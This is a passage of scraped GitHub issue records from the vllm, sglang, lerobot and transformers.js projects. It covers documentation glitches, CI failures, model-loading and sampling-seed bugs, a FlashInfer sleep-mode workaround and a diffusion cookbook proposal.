issue\n\nin [paged_attention.md](https://github.com/vllm-project/vllm/blob/ff2168bca3a195b835c64a5c9012d7b6a9f34e61/docs/design/paged_attention.md#query), there is an issue where a pictures arent formatted correctly and only show the html link .\nFor example, specifically, in the Query subsection, we can see:\n\n`![](../assets/design/paged_attention/q_vecs.png){ align=\"center\" alt=\"q_vecs\" width=\"70%\" }`\n\nThe asset isnt loaded correctly.\n\nThere are a total of **7 such issues**, particularly, we have \n\n- Query subsection - 2 instances.\n- Key subsection - 2 instances.\n- Value subsection - 3 instances\n\n### Suggest a potential alternative/fix\nPerhaps the reference for the images can be checked, it must be broken somewhere\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31066", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-20T06:23:44Z", "updated_at": "2025-12-22T01:38:56Z", "comments": 1, "user": "ssaketh-ch" }, { "repo": "vllm-project/vllm", "number": 31044, "title": "[CI Failure]: Blackwell Fusion Tests", "body": "### Name of failing test\n\nFAILED tests/compile/test_fusion_attn.py::test_attention_quant_pattern[AttentionBackendEnum.TRITON_ATTN-nvidia/Llama-4-Scout-17B-16E-Instruct-FP8-TestAttentionFp8StaticQuantPatternModel--quant_fp8-dtype1-533-128-40-8] - AssertionError: Tensor-likes are not close!\n\n### Basic information\n\n- [x] Flaky test\n- [ ] Can reproduce locally\n- [ ] Caused by external libraries (e.g. 
bug in `transformers`)\n\n### \ud83e\uddea Describe the failing test\n\nOn B200:\n\nFAILED tests/compile/test_fusion_attn.py::test_attention_quant_pattern[AttentionBackendEnum.TRITON_ATTN-nvidia/Llama-4-Scout-17B-16E-Instruct-FP8-TestAttentionFp8StaticQuantPatternModel--quant_fp8-dtype1-533-128-40-8] - AssertionError: Tensor-likes are not close!\n\n```bash\npytest -v -x tests/compile/test_fusion_attn.py::test_attention_quant_pattern\n```\n\n### \ud83d\udcdd History of failing test\n\nx\n\n### CC List.\n\nx", "url": "https://github.com/vllm-project/vllm/issues/31044", "state": "open", "labels": [ "help wanted", "torch.compile", "ci-failure" ], "created_at": "2025-12-19T18:49:59Z", "updated_at": "2025-12-26T21:58:25Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31043, "title": "[BugFix]: move torch.Size across graphs in split_graph", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWhen fixing a moe x cudagraph issue (see #30914), we found that `split_graph` may generate a submodule that returns a torch.Size and later another submodule that takes torch.Size. This errors out since pt2 somehow does not support `torch.Size` as an output yet. \n\nOne fix is to manually reorder some lines in the model code to avoid this split happening between getting the `torch.Size` and using it. But this is too intrusive and requires manual effort on many models.\n\nA more automated approach is to have a graph pass in `split_graph` that moves the torch.Size computation a bit, to avoid patterns like\n\n```\n# Old:\nsize = tensor_a.shape\nsome_cg_unsafe_op\ntensor_b = tensor_b.view(size)\n```\n---->\n\n```\n# New:\nsome_cg_unsafe_op\nsize = tensor_a.shape\ntensor_b = tensor_b.view(size)\n```\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31043", "state": "open", "labels": [ "help wanted", "feature request", "torch.compile" ], "created_at": "2025-12-19T18:24:58Z", "updated_at": "2025-12-22T21:23:04Z", "comments": 1, "user": "BoyuanFeng" }, { "repo": "sgl-project/sglang", "number": 15481, "title": "[Bug] Seeded Deterministic/Batch Invariant Inference Not Working on v1/completions endpoint", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest 
version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nI\u2019m trying to enable batch-invariant (deterministic) inference while serving SGLang behind an OpenAI API-compatible interface.\n\nDeterministic inference docs: https://docs.sglang.io/advanced_features/deterministic_inference.html\n\n## What works\n\nThe native /generate endpoint correctly varies output by seed and is repeatable per seed.\n\nExample request:\n\nPOST {base}/generate\n```json\n{\n \"text\": \"generate a uuid. UUID:\",\n \"sampling_params\": {\n \"temperature\": 1,\n \"max_new_tokens\": 32,\n \"sampling_seed\": 0\n }\n}\n```\n\nBehavior: changing sampling_seed changes the output; repeating with the same sampling_seed reproduces it.\n\n## What doesn\u2019t work\n\nOn the OpenAI-compatible endpoint POST {base}/v1/completions, seed appears to have no effect (even with temperature=1 and top_p=1).\n\nExample:\n\nPOST {base}/v1/completions\n```json\n{\n \"model\": \"Qwen/Qwen3-30B-A3B\",\n \"prompt\": \"generate a uuid. UUID: \",\n \"max_tokens\": 32,\n \"temperature\": 1,\n \"top_p\": 1,\n \"n\": 1,\n \"seed\": 0\n}\n```\n\nBehavior: response is the same regardless of seed value.\n\nExpected behavior\n\nWith --enable-deterministic-inference, I expected the OpenAI-compatible endpoints to:\n* honor seed as the sampling seed (analogous to sampling_seed), and\n* remain deterministic/repeatable for the same (prompt, params, seed).\n\n### Reproduction\n\nServer launch:\n\n```bash\nexec python3 -m sglang.launch_server \\\n --model-path \"Qwen/Qwen3-30B-A3B\" \\\n --host 0.0.0.0 \\\n --port 8000 \\\n --tp \"1\" \\\n --attention-backend \"triton\" \\\n --context-length \"32000\" \\\n --trust-remote-code \\\n --enable-deterministic-inference\n```\n\nPOST {base}/v1/completions\n```json\n{\n \"model\": \"Qwen/Qwen3-30B-A3B\",\n \"prompt\": \"generate a uuid. UUID: \",\n \"max_tokens\": 32,\n \"temperature\": 1,\n \"top_p\": 1,\n \"n\": 1,\n \"seed\": 0\n}\n```\n\nvarying the seed results in same output\n\n### Environment\n\n==========\n== CUDA ==\n==========\nCUDA Version 12.9.1\nContainer image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. 
All rights reserved.\nThis container image and its contents are governed by the NVIDIA Deep Learning Container License.\nBy pulling and using the container, you accept the terms and conditions of this license:\nhttps://developer.nvidia.com/ngc/nvidia-deep-learning-container-license\nA copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.\nAuto-detected 1 GPU(s)\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 0 Compute Capability: 12.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 580.105.08\nPyTorch: 2.9.1+cu129\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.3.5\naiohttp: 3.13.2\nfastapi: 0.124.2\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.20\npyzmq: 27.1.0\nuvicorn: 0.38.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 2.0.0\nNVIDIA Topology:\n\t\u001b[4mGPU0\tNIC0\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\u001b[0m\nGPU0\t X \tSYS\t0-63,128-191\t0\t\tN/A\nNIC0\tSYS\t X\nLegend:\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\nNIC Legend:\n NIC0: mlx5_bond_0\nulimit soft: 1024", "url": "https://github.com/sgl-project/sglang/issues/15481", "state": "closed", "labels": [ "bug", "high priority" ], "created_at": "2025-12-19T15:04:26Z", "updated_at": "2025-12-20T04:32:15Z", "comments": 8, "user": "jamesheavey" }, { "repo": "huggingface/lerobot", "number": 2684, "title": "How to manually push a dataset", "body": "Say you `lerobot-record` a dataset with the flag `--dataset.push_to_hub=False`, or you encounter any problem at uploading time.\n\nIs using `hf upload` enough, or does `lerobot` datasets need additional stuff?", "url": "https://github.com/huggingface/lerobot/issues/2684", "state": "open", "labels": [ "documentation", "question", "dataset" ], "created_at": "2025-12-19T13:00:20Z", "updated_at": "2025-12-19T15:41:42Z", "user": "mcres" }, { "repo": "vllm-project/vllm", "number": 31023, "title": "[Doc]: FP8 KV Cache: Does softmax output multiply with FP8 V directly or after dequantization?", "body": "### \ud83d\udcda The doc issue\n\nhttps://docs.vllm.ai/en/v0.8.5.post1/features/quantization/quantized_kvcache.html\nQuestion:\nIn the FP8 KV Cache implementation, after computing attention scores and softmax at higher precision (FP16/BF16), is the resulting attention weight matrix:\nQuantized to FP8 and multiplied directly with FP8 V cache, or\nMultiplied with V cache after dequantizing V to higher precision?\nThe documentation mentions \"no fused dequantization and attention operations yet\" but doesn't specify the precision of this final 
multiplication. Clarifying this detail would help understand the accuracy-performance tradeoff.\nThanks!\n\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31023", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-19T10:33:22Z", "updated_at": "2025-12-22T00:41:38Z", "comments": 0, "user": "jorjiang" }, { "repo": "vllm-project/vllm", "number": 31019, "title": "[Bug]: Qwen3-VL 2:4 sparsity llm-compressor RuntimeError: shape mismatch (0.12, 0.13rc2)", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-1017-azure-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 580.95.05\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.09\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsa: Vulnerable: Clear CPU buffers attempted, no microcode\nVulnerability Tsx async abort: Not 
affected\nVulnerability Vmscape: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime", "url": "https://github.com/vllm-project/vllm/issues/31019", "state": "open", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-19T09:18:00Z", "updated_at": "2025-12-24T12:16:01Z", "comments": 4, "user": "SorenDreano" }, { "repo": "vllm-project/vllm", "number": 31016, "title": "[Bug]: FlashInfer Incompatible with Sleep Mode", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nHere is a script to reproduce the bug: \nI use vllm=v0.10.1 and flashinfer-python=v0.5.3.\n```\nfrom vllm import LLM, SamplingParams\n\nif __name__ == \"__main__\":\n model_pth = \"xxx/Qwen3-1.7B\" \n tp_size = 1\n llm = LLM(\n model=model_pth, \n enable_sleep_mode=True,\n tensor_parallel_size=tp_size,\n gpu_memory_utilization=0.7, \n )\n\n llm.sleep(level=1)\n llm.wake_up()\n\n prompts = [\n \"What is AI?\", \n \"Where is the Machu Picchu located?\", \n \"What is the capital of France?\",\n \"Who painted the Mona Lisa?\",\n ]\n\n sampling_params = SamplingParams(\n temperature=0.7,\n top_p=0.9,\n max_tokens=64,\n )\n\n outputs = llm.generate(prompts, sampling_params)\n\n for i, out in enumerate(outputs):\n prompt = prompts[i]\n generated = out.outputs[0].text\n print(f\"Prompt {i}: {prompt!r}\")\n print(f\"Generation: {generated}\\n\")\n ```\n\n### Root Cause\nThe bug occurs because the FlashInfer backend\u2019s `attn_metadata` is stateful. It holds a `block_table_arange` tensor that is initialized once and then reused across subsequent calls to `build`:\n\n```python\nself.block_table_arange = torch.arange(\n max_num_pages_per_req,\n dtype=torch.int32,\n device=self.device,\n)\n```\n\nThis `block_table_arange` tensor is allocated in the mempool with the `\"kv_cache\"` tag. It gets discarded after calling `llm.sleep`, but is not recreated when the engine wakes up, which leads to incorrect values and thus wrong outputs.\n\nSpecifically, this will cause bad rollout outputs in VERL using vllm + flashinfer.\n\n### Temporary Fix\nHere is a patch as a temporary workaround. It\u2019s not an ideal solution, but it works:\n\n```python\nfrom vllm.v1.attention.backends.flashinfer import FlashInferMetadataBuilder\nimport torch\n\ndef patch_flashinfer_build():\n old_build = FlashInferMetadataBuilder.build\n\n def new_build(*args, **kwargs):\n self = args[0]\n max_num_pages_per_req = self.block_table_arange.numel()\n self.block_table_arange.copy_(\n torch.arange(\n max_num_pages_per_req,\n device=self.block_table_arange.device,\n dtype=self.block_table_arange.dtype,\n )\n )\n return old_build(*args, **kwargs)\n\n FlashInferMetadataBuilder.build = new_build\n\npatch_flashinfer_build()\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31016", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-19T08:04:19Z", "updated_at": "2025-12-19T23:17:47Z", "comments": 1, "user": "xiaoxiaosuaxuan" }, { "repo": "huggingface/transformers.js", "number": 1490, "title": "Example models for each pipeline", "body": "### Question\n\nRight now, I sorta use the docs and some searches to find good default models for https://workglow.dev/ for each pipeline that transformerjs has to offer. But they are not really the best, either in size or performance.\n\nIt would be great to have a list for each pipeline for fast and effective, best of breed, and a workhorse that is in between. 
Like a good, better, best.", "url": "https://github.com/huggingface/transformers.js/issues/1490", "state": "open", "labels": [ "question" ], "created_at": "2025-12-19T07:37:16Z", "updated_at": "2025-12-19T17:41:01Z", "user": "sroussey" }, { "repo": "vllm-project/vllm", "number": 31004, "title": "[New Model]: T5Gemma 2", "body": "### The model to consider.\n\nhttps://huggingface.co/collections/google/t5gemma-2\n\n\n### The closest model vllm already supports.\n\n_No response_\n\n### What's your difficulty of supporting the model you want?\n\nI know vLLM dropped encoder-decoder support, but can we bring it back?\n\nhttps://huggingface.co/docs/transformers/model_doc/t5gemma2\nhttps://blog.google/technology/developers/t5gemma-2/\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31004", "state": "open", "labels": [ "new-model" ], "created_at": "2025-12-19T03:55:00Z", "updated_at": "2025-12-20T21:37:34Z", "comments": 1, "user": "ducviet00-h2" }, { "repo": "sgl-project/sglang", "number": 15443, "title": "SGLang Diffusion Cookbook Proposal", "body": "# \ud83c\udfa8 [Community Contribution] Create SGLang Diffusion Models Cookbook\n\n## \ud83c\udfaf Goal\nCreate a comprehensive cookbook for diffusion models in SGLang, demonstrating SGLang's performance advantages for image and video generation workloads.\n\n## \ud83d\udccb Scope\n\n### Models to Cover\n\n**Image Generation:**\n- Flux-1 Dev\n- Flux-2 \n- SDXL-Turbo\n- Qwen Image Edit\n\n**Video Generation:**\n- Wan 2.1\n- Wan 2.2\n\n### Content Structure\n\nEach model section includes:\n1. **Model Introduction**\n - Capabilities and use cases\n - Resolution/quality specifications\n - Style examples and output samples\n - Links to official resources\n\n2. **SGLang Deployment**\n - One-command server launch\n - Client usage example\n - Model-specific optimization tips\n\n3. 
**Performance Benchmarks**\n - Throughput (images/sec or videos/min)\n - Latency and memory usage\n - Comparison: SGLang vs Diffusers vs ComfyUI\n - Bar charts and scaling analysis\n - Reproducible benchmark scripts\n\n## \ud83d\udce6 Deliverables\n```\ncookbook/diffusion/\n\u251c\u2500\u2500 README.md # Main cookbook\n\u251c\u2500\u2500 examples/ # Usage scripts per model\n\u2502 \u251c\u2500\u2500 flux1_basic.py\n\u2502 \u251c\u2500\u2500 sdxl_turbo.py\n\u2502 \u251c\u2500\u2500 wan21_video.py\n\u2502 \u2514\u2500\u2500 ...\n\u251c\u2500\u2500 benchmarks/\n\u2502 \u251c\u2500\u2500 bench_image.py\n\u2502 \u251c\u2500\u2500 bench_video.py\n\u2502 \u251c\u2500\u2500 compare_backends.py\n\u2502 \u2514\u2500\u2500 run_all.sh\n\u2514\u2500\u2500 assets/\n \u2514\u2500\u2500 output_examples/ # Curated generation examples\n```\n\n## \ud83d\ude80 Timeline\n\n**Phase 1 (Weeks 1-2):** MVP with Flux-1 + SDXL-Turbo \n**Phase 2 (Weeks 3-4):** Add remaining image models \n**Phase 3 (Weeks 5-6):** Video models + comprehensive benchmarks \n\n## \ud83d\udcaa How to Contribute\n\nWe need help with:\n\n### Required Contributors (2-3 people)\n- [ ] **Benchmark Engineer**: Run performance tests on H100/A100\n - Time commitment: ~10 hours/week for 4 weeks\n - Requirements: GPU access, Python proficiency\n \n- [ ] **Documentation Writer**: Create usage examples and guides\n - Time commitment: ~8 hours/week for 4 weeks\n - Requirements: Technical writing, SGLang familiarity\n\n- [ ] **Visual Designer** (optional): Curate output examples\n - Time commitment: ~5 hours/week for 2 weeks\n - Requirements: Eye for quality, prompt engineering\n\n### Hardware Requirements\n- H100 (80GB) - primary testing platform\n- A100 (40GB) - secondary platform (optional)\n- Access via cloud providers acceptable (AWS/Lambda/RunPod)\n\n## \ud83d\udcdd Contribution Process\n\n1. **Comment below** if interested (mention which role)\n2. **Join discussion** on implementation details\n3. **Fork repo** and work on assigned section\n4. **Submit PR** following SGLang cookbook standards\n5. **Iterate** based on review feedback\n\n## \ud83d\udd17 References\n\n- [SGLang Cookbook Template](https://cookbook.sglang.io/)\n- [DeepSeek-V3 Example](https://cookbook.sglang.io/docs/DeepSeek/DeepSeek-V3_2)\n- [Wan 2.1 GitHub](https://github.com/Wan-Video/Wan2.1)\n- [SGLang Documentation](https://docs.sglang.ai/)\n\n## \u2753 Questions?\n\n**Q: I only have consumer GPUs (4090/3090), can I help?** \nA: Yes! You can help with documentation, examples, or testing the 1.3B Wan model. You can reach out @Richardczl98 for requesting additional GPUs\n\n**Q: Which video model should we prioritize first?** \nA: Wan 2.1 - it's the most mature open-source option.\n\n**Q: Do I need to know SGLang internals?** \nA: No, just familiarity with diffusion models and Python.\n\n---\n\n**Ready to contribute?** Drop a comment below! \ud83d\ude80\n\ncc @mickqian @Qiaolin-Yu @yhyang201 ", "url": "https://github.com/sgl-project/sglang/issues/15443", "state": "open", "labels": [], "created_at": "2025-12-19T03:44:33Z", "updated_at": "2025-12-23T13:09:31Z", "comments": 1, "user": "Richardczl98" }, { "repo": "vllm-project/vllm", "number": 30969, "title": "[Bug]: SmolLM3-3B FP8 Fails to Load [`compressed-tensors` and `transformers-impl` compatibility issue]", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\nRunning in official Docker image: vllm/vllm-openai:v0.11.1\nGPU: NVIDIA L4 (GCP g2-standard-8)\n`| NVIDIA-SMI 570.195.03 Driver Version: 570.195.03 CUDA Version: 12.9 |`\nvLLM version: 0.11.1\n\n```text\n0.11.1\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvLLM v0.11.1 fails to load SmolLM3-3B FP8 quantized models with llm-compressor using compressed-tensors.\nSame models work on v0.11.0.\n\nTested with:\n- [huggingface.co/RedHatAI/SmolLM3-3B-FP8-dynamic](https://huggingface.co/RedHatAI/SmolLM3-3B-FP8-dynamic)\n- Manually quantized fine tuned [SmolLM3-3B](https://huggingface.co/HuggingFaceTB/SmolLM3-3B) using llmcompressor==0.7 (compressed-tensors==0.12.2) in FP8-dynamic\n- Manually quantized fine tuned [SmolLM3-3B(https://huggingface.co/HuggingFaceTB/SmolLM3-3B) using llmcompressor==0.8.1 (compressed-tensors==0.12.2) in FP8-dynamic\n\nAll fail on v0.11.1.\nAll work on v0.11.0.\n\nError occurs during model loading in find_matched_target function.\nThe error is: \"Unable to find matching target for model.layers.0.self_attn.q_proj in the compressed-tensors config\"\n\nComplete error\n```\n+ exec python3 -m vllm.entrypoints.openai.api_server --model RedHatAI/SmolLM3-3B-FP8-dynamic --port 8000 --trust-remote-code --max-model-len 5000\n[APIServer pid=1] INFO 12-12 05:05:29 [api_server.py:1772] vLLM API server version 0.11.1\n[APIServer pid=1] INFO 12-12 05:05:29 [utils.py:253] non-default args: {'model': 'RedHatAI/SmolLM3-3B-FP8-dynamic', 'trust_remote_code': True, 'max_model_len': 5000}\n[APIServer pid=1] The argument `trust_remote_code` is to be used with Auto classes. It has no effect here and is ignored.\n[APIServer pid=1] INFO 12-12 05:05:40 [model.py:637] Resolved architecture: SmolLM3ForCausalLM\n[APIServer pid=1] INFO 12-12 05:05:40 [model.py:1750] Using max model len 5000\n[APIServer pid=1] INFO 12-12 05:05:42 [scheduler.py:228] Chunked prefill is enabled with max_num_batched_tokens=2048.\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:54 [core.py:93] Initializing a V1 LLM engine (v0.11.1) with config: model='RedHatAI/SmolLM3-3B-FP8-dynamic', quantization=compressed-tensors\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [parallel_state.py:1200] world_size=1 rank=0 local_rank=0 distributed_init_method=tcp://10.111.66.205:48123 backend=nccl\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [parallel_state.py:1408] rank 0 in world size 1 is assigned as DP rank 0, PP rank 0, PCP rank 0, TP rank 0, EP rank 0\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:55 [gpu_model_runner.py:3467] Starting to load model RedHatAI/SmolLM3-3B-FP8-dynamic...\n[EngineCore_DP0 pid=37] INFO 12-12 05:05:56 [base.py:121] Using Transformers modeling backend.\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] EngineCore failed to start.\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] Traceback (most recent call last):\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 834, in run_engine_core\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] engine_core = EngineCoreProc(*args, **kwargs)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 610, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core.py\", line 102, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] super().__init__(\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/executor/abstract.py\", line 101, in __init__\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model_executor = 
executor_class(vllm_config)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/executor/uniproc_executor.py\", line 48, in _init_executor\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self._init_executor()\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_worker.py\", line 273, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.driver_worker.load_model()\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 3484, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model_runner.load_model(eep_scale_up=eep_scale_up)\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] File \"/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/base_loader.py\", line 49, in load_model\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [core.py:843] self.model = model_loader.load_model(\n[EngineCore_DP0 pid=37] ERROR 12-12 05:05:56 [cor", "url": "https://github.com/vllm-project/vllm/issues/30969", "state": "closed", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-18T14:36:30Z", "updated_at": "2025-12-20T21:54:47Z", "comments": 3, "user": "GauthierRoy" }, { "repo": "huggingface/lerobot", "number": 2680, "title": "Invalid frame index when training on merged datasets [RuntimeError]", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: Linux-5.4.0-165-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 4.4.2-0ubuntu0.22.04.1\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: Quadro RTX 6000\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nI'm having a problem when training a VLA with `lerobot-train` on a merged dataset.\nI'm aware of the issue #2627 as well as PR #2550 that is supposed to fix the bug.\nHowever, the problem is still occurring on the latest commit (4a151a9) of lerobot 0.4.3.\n\nThe dataset has been merged with the following 